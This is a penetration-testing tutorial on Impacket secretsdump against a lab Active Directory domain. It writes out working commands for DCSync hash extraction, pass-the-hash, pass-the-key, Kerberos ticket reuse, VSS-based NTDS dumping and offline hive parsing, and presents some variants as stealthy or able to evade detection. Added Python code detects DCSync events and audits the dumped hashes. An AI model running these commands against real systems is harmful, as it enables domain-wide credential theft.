
Impacket for Pentester: SecretsDump

impacket-secretsdump is a powerful post-exploitation tool from the Impacket framework by Fortra that remotely extracts credentials from Windows systems — including NTLM hashes, Kerberos keys, LSA secrets, SAM databases, and cached domain logon info — without dropping any agent or binary on the target.

Table of Contents

  1. Introduction
  2. What Is secretsdump and How Does It Work?
  3. Viewing Help & Available Options
  4. Remote Domain Credential Dump via DRSUAPI (DCSync)
    • Just-dc — Domain Credentials Only
    • Just-dc-ntlm — NTLM Hashes Only
    • Just-dc-user — Single User Extraction
  5. Authentication Methods
    • Kerberos Ticket Authentication (-k -no-pass)
    • Pass-the-Hash (-hashes)
    • AES Key Authentication (-aesKey)
  6. Volume Shadow Copy (VSS) Method
    • SecretsDump with wmiexec + VSS
    • SecretsDump with mmcexec + VSS
  7. VSS vs DRSUAPI
  8. Filtering & Scoping Output
    • Exclude Specific Users (-skip-user)
    • Password Last Set (-pwd-last-set)
    • Account Status (-user-status)
  9. Timestamps and Logging (-ts)
  10. Writing to File (-outputfile)
  11. Remote Shadow Snapshot via WMI (-use-remoteSSWMI)
  12. Offline Credential Extraction (Offline Cracking)
    • Dumping Local SAM Hashes
    • Dump LSA Secrets
    • Offline NTDS Dump
  13. Conclusion
  14. Disclaimer

What Is secretsdump and How Does It Work?

secretsdump.py (shipped as impacket-secretsdump on Kali) is an agentless credential-extraction framework that can operate both locally and remotely. It uses three distinct mechanisms:

  • DRSUAPI (DCSync): Invokes the Directory Replication Service remote protocol to pull password hashes directly from NTDS.DIT on a Domain Controller — no local file access required.
  • VSS (Volume Shadow Copy): Uses vssadmin via smbexec/wmiexec/mmcexec to snapshot and copy locked database files (SAM, SYSTEM, NTDS.DIT) before parsing them locally.
  • Local Registry Hives: Reads offline SAM + SYSTEM hive files (e.g., acquired via reg save) to decrypt and display local account hashes.

Viewing Help & Available Options

Run impacket-secretsdump -h to see the full option set. The key parameters you will use most often are shown in the image below:

impacket-secretsdump -h

Remote Domain Credential Dump via DRSUAPI (DCSync)

RemoteOperations connects to the remote registry over SMB and reads the SAM and SECURITY hives directly. This gives local account hashes, LSA secrets, DCC2 cached logon hashes, DPAPI keys, and DefaultPassword if Auto-Logon is configured.

DRSUAPI uses the DCSync replication protocol to pull the entire NTDS.dit. This succeeds whenever the authenticating account holds the Replicating Directory Changes All right.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11

Output includes:

NTLM hashes for every domain user (format: username:RID:LMhash:NThash) — including Administrator, Guest, krbtgt, and all domain users like raj, sanjeet, komal, etc.

Kerberos keys (AES-256, AES-128, DES-CBC-MD5) for each user — these can be used for Pass-the-Hash, Pass-the-Ticket, or Golden Ticket attacks

Computer account hashes for DC$, MSEDGEWIN10$, WIN-SQL$, and service accounts like MyGMSA$ and fakepc$

Just-dc — Domain Credentials Only

The -just-dc flag dumps everything from the Domain Controller: all NTLM hashes AND Kerberos keys for every account. This is the most comprehensive single-flag option, producing both the hash table and the full suite of AES/DES Kerberos encryption keys.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc

Breaking it down:

  • ignite.local/shivam:Password@1  — domain\username:password authentication
  • @192.168.1.11  — IP address of the Domain Controller (target)
  • just-dc  — skip remote SAM / LSA secrets; use DRSUAPI (DCSync) to pull NTDS.DIT secrets only

Just-dc-ntlm — NTLM Hashes Only

This command connects to the Domain Controller at 192.168.1.11 in the ignite.local domain, authenticates as shivam with password Password@1, and uses the DRSUAPI (DCSync) method to extract only NTLM hashes from the NTDS.DIT database — skipping Kerberos keys, LSA secrets, SAM, and DPAPI data entirely.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc-ntlm

Why Use -just-dc-ntlm?

  • ⚡ Faster — skips Kerberos key parsing, less data transferred
  • 🔕 Less noise — fewer DRSUAPI calls to the DC
  • 🎯 Focused — when you only need hashes for PtH or cracking
  • 🧹 Cleaner output — easier to pipe into tools like hashcat or netexec

Just-dc-user — Single User Extraction

 This performs a targeted, single-account DCSync — extracting credentials only for the administrator account from the Domain Controller, rather than dumping the entire NTDS.DIT. It is one of the stealthiest credential dumping techniques available in Impacket.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc-user administrator

This retrieves only the Administrator hash and Kerberos keys — useful when you need one specific account’s credentials quickly.

Parameters Explained

The -just-dc-user vs other flags comparison table is presented as an image in the original post.

Authentication Methods

Kerberos Ticket (-k -no-pass)

This technique authenticates to the Domain Controller entirely via a stolen/forged Kerberos ticket — no plaintext password, no NTLM hash required. It is one of the stealthiest DCSync methods available.

In simple terms:

  • You already have a Kerberos ticket (.ccache)
  • You authenticate using that ticket
  • No password or NTLM hash is required

export KRB5CCNAME=administrator.ccache
impacket-secretsdump ignite.local/administrator@dc.ignite.local -k -no-pass

Pass-the-Hash (-hashes)

This command authenticates to the Domain Controller using shivam’s NTLM hash instead of a plaintext password — a classic Pass-the-Hash (PtH) attack.

impacket-secretsdump ignite.local/shivam@192.168.1.11 -hashes :64FBAE31CC352FC26AF97CBDEF151E03

Parameters Explained

The parameter breakdown for this command is presented as an image in the original post.

AES Key Authentication (-aesKey)

This performs a Pass-the-Key (PtK) attack — authenticating to the Domain Controller using the Administrator’s AES-256 Kerberos encryption key instead of a password or NTLM hash.

impacket-secretsdump ignite.local/administrator@dc.ignite.local \
  -aesKey 7c1baf269d1918e4a0b02d4420fa0b2b62c8d4eab7cde8d2adafc5c547283940

Auth Method Comparison — All Techniques

The comparison table of all authentication techniques is presented as an image in the original post.

Volume Shadow Copy (VSS) Method

This command uses Impacket (secretsdump.py) to dump credentials from a Volume Shadow Copy of the target system, a completely different technique from DCSync/DRSUAPI.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss

VSS vs DRSUAPI

The fundamental difference in one sentence: DRSUAPI asks the DC to hand over password data using its own replication protocol — no files touched, no commands executed. VSS physically snapshots the drive and reads the locked files directly — more data, more noise.

When each is the right choice:

  • Use DRSUAPI (-just-dc, -just-dc-ntlm, default remote) when you need domain hashes fast and quietly. It fires a single RPC call, gets every NT hash and Kerberos key, and leaves no artifact. The only detection surface is Event 4662 with the DCSync GUIDs from a non-DC source.
  • Use VSS (-use-vss) when domain hashes alone aren’t enough. The three scenarios where VSS is irreplaceable:
    • You need DefaultPassword — the cleartext admin password from Auto-Logon config, which DRSUAPI never sees because it lives in the SECURITY hive, not NTDS.dit
    • You need DPAPI master keys to decrypt browser-saved passwords, certificate private keys, or Credential Manager vault entries
    • You need DCC2 cached logon hashes for offline cracking, which exist only in the SECURITY hive on the DC itself
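That single detection surface is worth making concrete for the blue team. Added example for this article (not code from the original post or from Impacket): a Python check over constructed Security Event 4662 records that flags the DCSync replication GUIDs when the requesting principal is not in an assumed domain-controller allowlist (KNOWN_DC_ACCOUNTS, which you would replace with your own).

```python
"""Flag DCSync-style replication requests in Windows Security Event 4662.

Added example for this article, not code from the original post or from Impacket.
The event records below are constructed to carry only the 4662 fields this check
needs, and KNOWN_DC_ACCOUNTS is an assumed allowlist to replace with your own."""
import re
from dataclasses import dataclass

# Extended rights a client exercises when it replicates directory secrets.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
DCSYNC_GUIDS = {
    DS_REPLICATION_GET_CHANGES,
    DS_REPLICATION_GET_CHANGES_ALL,
    DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET,
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when an extended right is exercised

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.IGNORECASE)

# Assumed allowlist: machine accounts of the domain's own controllers.
KNOWN_DC_ACCOUNTS = {"DC$"}


@dataclass(frozen=True)
class Event4662:
    subject_user: str    # SubjectUserName
    subject_domain: str  # SubjectDomainName
    access_mask: int     # AccessMask
    properties: str      # Properties: access-right text followed by the GUIDs requested


# Constructed sample records (not real captures).
SAMPLE_EVENTS = [
    # A DC replicating from its peer: expected traffic.
    Event4662("DC$", "IGNITE", 0x100,
              "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    # A user account exercising the replication rights: DCSync from a non-DC.
    Event4662("shivam", "IGNITE", 0x100,
              "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
              "{89e95b76-444d-4c62-991a-0facbeda640c}"),
    # Some other extended right on a user object: unrelated to replication.
    Event4662("raj", "IGNITE", 0x100, "%%7688 {bf967aba-0de6-11d0-a285-00aa003049e2}"),
]


def requested_dcsync_rights(properties):
    """Return the DCSync replication GUIDs present in a 4662 Properties field."""
    return {g.lower() for g in GUID_RE.findall(properties)} & DCSYNC_GUIDS


def is_dcsync_from_non_dc(event, known_dcs=KNOWN_DC_ACCOUNTS):
    """True when replication rights are exercised by a principal outside the DC allowlist."""
    if not event.access_mask & CONTROL_ACCESS:
        return False
    if not requested_dcsync_rights(event.properties):
        return False
    return event.subject_user.upper() not in {d.upper() for d in known_dcs}


def find_dcsync_alerts(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return (DOMAIN\\user, [guids]) for every suspicious replication event."""
    alerts = []
    for event in events:
        if is_dcsync_from_non_dc(event, known_dcs):
            alerts.append((f"{event.subject_domain}\\{event.subject_user}",
                           sorted(requested_dcsync_rights(event.properties))))
    return alerts


if __name__ == "__main__":
    for principal, guids in find_dcsync_alerts(SAMPLE_EVENTS):
        print(f"DCSync from non-DC principal {principal}: {', '.join(guids)}")
```

Two caveats when deploying this: 4662 is only generated when Directory Service Access auditing is enabled and the domain object carries a SACL for these rights, and directory-synchronisation service accounts (for example the Entra/Azure AD Connect sync account) legitimately exercise the same rights and belong on the allowlist alongside the DC machine accounts.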

SecretsDump with wmiexec + VSS

This performs a VSS-based NTDS.DIT credential dump using WMI (Windows Management Instrumentation) as the remote execution engine instead of the default smbexec. It is the stealthiest variant of the VSS method — leaving fewer forensic artifacts on the target Domain Controller.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss -exec-method wmiexec

SecretsDump with mmcexec + VSS

This performs a VSS-based NTDS.DIT credential dump using the MMC20.Application DCOM object as the remote execution engine. It is the most unconventional and evasion-focused of the three -exec-method options, abusing a legitimate Windows management interface instead of SMB services or the WMI process.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-vss -exec-method mmcexec

In the author's run the mmcexec attempt failed at the NTDS.dit copy; what still succeeded before that failure:

mmcexec is only needed for the VSS/NTDS portion. Before trying to snapshot the drive, secretsdump already completed the local phases — SAM hashes, cached domain logon, and LSA secrets are dumped via the registry over SMB (not via the exec method). The Cleaning up… message confirms those phases ran fine. Only the NTDS.dit copy failed.

The three exec methods ranked by reliability and stealth are presented as an image in the original post.

Filtering & Scoping Output

This performs a filtered DCSync dump that skips two of the four major credential sources — the SAM hive and the SECURITY hive — and dumps only the NTDS.DIT domain credentials (NTLM hashes + Kerberos keys). 

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -skip-sam -skip-security

Skipping these hives speeds up the dump when you only care about domain credentials and want to avoid the rpc_s_access_denied error from Remote Operations.

The guidance on when to choose each approach is presented as an image in the original post.

Exclude Specific Users (-skip-user)

The -skip-user flag checks whether the username matches the skip list and simply skips writing that entry to the output.

In other words, the data may still be accessed internally during enumeration, but those specific user entries are filtered out and never written to the output, keeping the results cleaner, more focused, and less likely to include sensitive or unnecessary accounts.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -skip-user krbtgt,guest

Password Last Set (-pwd-last-set)

This performs a DCSync dump of all domain credentials (NTLM hashes + Kerberos keys) and appends the pwdLastSet timestamp to every account’s output line. It reveals exactly when each user’s password was last changed — a goldmine for password auditing, offline cracking prioritization, and identifying stale accounts.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -pwd-last-set

Account Status (-user-status)

It allows an attacker — or a pen tester — to instantly see which accounts are active vs dormant, prioritizing targets intelligently. Key observations from our output: Guest and krbtgt are Disabled; all regular user accounts are Enabled; Administrator is Enabled with a unique hash different from the domain users, confirming it has a separate custom password.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -just-dc -user-status

Timestamps and Logging (-ts)

The -ts flag is a global logging modifier that prepends a timestamp to every single line of logging output produced by impacket-secretsdump. It is the simplest yet most operationally useful flag for log management, forensic reporting, and red team documentation.

Writing to File (-outputfile)

The -outputfile flag saves all dumped credentials to multiple organized files on disk using dump as the base filename. Instead of only printing to the terminal, every secret is written to a dedicated file — making it ideal for offline cracking, reporting, and large-scale domain assessments.

impacket-secretsdump ignite.local/shivam:Password@1@192.168.1.11 -outputfile dump

cat dump.ntds
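Once the dump is on disk, the same data serves the blue team's password audit. Added example, not from the original post or from Impacket: a Python parser for the username:RID:LMhash:NThash::: lines that dump.ntds (or the console output from the -pwd-last-set and -user-status sections above) contains, reporting enabled accounts with the empty-password NT hash, accounts sharing an NT hash, stale passwords and disabled accounts. The sample lines are constructed with placeholder hashes, and the (pwdLastSet=...) (status=...) suffix shape is assumed from the flags' described output rather than copied from a capture.

```python
"""Audit a secretsdump NTDS dump (dump.ntds from -outputfile, or pasted console lines)
for weak or stale domain credentials.

Added example for this article, not code from the original post or from Impacket.
SAMPLE_DUMP is constructed: the hashes are placeholders and the (pwdLastSet=...)
(status=...) suffixes follow the shape the -pwd-last-set / -user-status flags are
described as producing."""
import re
from collections import defaultdict
from datetime import datetime

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty password

LINE_RE = re.compile(
    r"^(?P<user>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::(?P<extra>.*)$",
    re.IGNORECASE)
PWDLASTSET_RE = re.compile(r"\(pwdLastSet=(?P<v>[^)]+)\)")
STATUS_RE = re.compile(r"\(status=(?P<v>Enabled|Disabled)\)")

# Constructed sample dump: log lines, hash lines, one Kerberos key line, cleanup line.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef::: (pwdLastSet=2025-01-15 09:30) (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (pwdLastSet=never) (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210::: (pwdLastSet=2023-06-01 08:00) (status=Disabled)
ignite.local\\raj:1104:aad3b435b51404eeaad3b435b51404ee:1111111111111111aaaaaaaaaaaaaaaa::: (pwdLastSet=2021-03-02 11:00) (status=Enabled)
ignite.local\\sanjeet:1105:aad3b435b51404eeaad3b435b51404ee:1111111111111111aaaaaaaaaaaaaaaa::: (pwdLastSet=2024-11-20 14:05) (status=Enabled)
ignite.local\\komal:1106:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (pwdLastSet=2024-12-01 10:00) (status=Enabled)
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2222222222222222bbbbbbbbbbbbbbbb::: (pwdLastSet=2025-02-01 03:00) (status=Enabled)
Administrator:aes256-cts-hmac-sha1-96:0000000000000000000000000000000000000000000000000000000000000000
[*] Cleaning up...
"""


def parse_dump(text):
    """Return one dict per hash line; log lines and Kerberos key lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        extra = m.group("extra")
        last_set = PWDLASTSET_RE.search(extra)
        status = STATUS_RE.search(extra)
        accounts.append({
            "user": m.group("user").split("\\")[-1],   # drop the domain prefix
            "rid": int(m.group("rid")),
            "nt": m.group("nt").lower(),
            "pwd_last_set": last_set.group("v") if last_set else None,
            "status": status.group("v") if status else None,
        })
    return accounts


def audit(accounts, as_of, stale_days=365):
    """Summarise weak or stale credentials; as_of is 'YYYY-MM-DD' so results are reproducible."""
    reference = datetime.strptime(as_of, "%Y-%m-%d")
    findings = {"empty_password_enabled": [], "shared_nt_hash": [],
                "stale_password": [], "disabled": []}
    by_hash = defaultdict(list)
    for acct in accounts:
        if acct["status"] == "Disabled":          # listed, then excluded from the other checks
            findings["disabled"].append(acct["user"])
            continue
        if acct["nt"] == EMPTY_NT:
            findings["empty_password_enabled"].append(acct["user"])
        else:
            by_hash[acct["nt"]].append(acct["user"])
        last_set = acct["pwd_last_set"]
        if last_set and last_set != "never":
            age_days = (reference - datetime.strptime(last_set, "%Y-%m-%d %H:%M")).days
            if age_days > stale_days:
                findings["stale_password"].append((acct["user"], age_days))
    # Identical NT hashes mean identical passwords: reuse across accounts.
    findings["shared_nt_hash"] = sorted(sorted(users) for users in by_hash.values() if len(users) > 1)
    return findings


if __name__ == "__main__":
    for key, value in audit(parse_dump(SAMPLE_DUMP), "2025-03-01").items():
        print(f"{key}: {value}")
```

Without -user-status the status field is None and an account is treated as enabled; without -pwd-last-set the staleness check is simply skipped, so run the dump with both flags when the goal is an audit rather than a hash list.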

Remote Shadow Snapshot via WMI (-use-remoteSSWMI)

This technique first creates the Shadow Snapshot, retrieves an SMB-accessible path to the snapshot volume, then dumps all secrets from the snapshot. It is an alternative when classic VSS exec methods are blocked by endpoint detection controls.

impacket-secretsdump ignite.local/administrator:Ignite@987@192.168.1.11 -use-remoteSSWMI

Dumping Local SAM Hashes

The simplest use case is reading registry hive files that were exported from a target: secretsdump parses them locally on the attacker machine without making any connection to the target.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Dump LSA Secrets

This is the LSA Secrets-focused offline parsing mode — it decrypts and extracts only the SECURITY hive contents (LSA Secrets, cached domain logons, DPAPI keys, machine passwords) using the bootKey from the SYSTEM hive, with zero network activity.

impacket-secretsdump -security SECURITY -system SYSTEM LOCAL

Offline NTDS Dump

This command parses the NTDS database with the SYSTEM hive, recovers NTLM hashes and Kerberos keys for all domain accounts, and prints them to the console for further post‑exploitation or cracking. Once you have these two files, the entire domain is compromised offline — no DC connection, no authentication, no noise.

impacket-secretsdump -ntds ntds.dit -system system local

Conclusion

Impacket secretsdump is a versatile, multi-mode credential extraction tool that covers everything from offline SAM parsing to full DCSync against a live domain controller. Its ability to authenticate via password, hash, Kerberos ticket, or AES key makes it adaptable to virtually every stage of a penetration test. The richer output options (-pwd-last-set, -user-status, -ts, -outputfile) transform raw hash dumps into actionable intelligence for both offensive teams and blue teamers looking to understand the exposure surface.

Disclaimer: All techniques described in this article were performed in a controlled, isolated lab environment. Use of these tools against systems without explicit written authorization is illegal. Always obtain proper permissions before conducting security assessments.
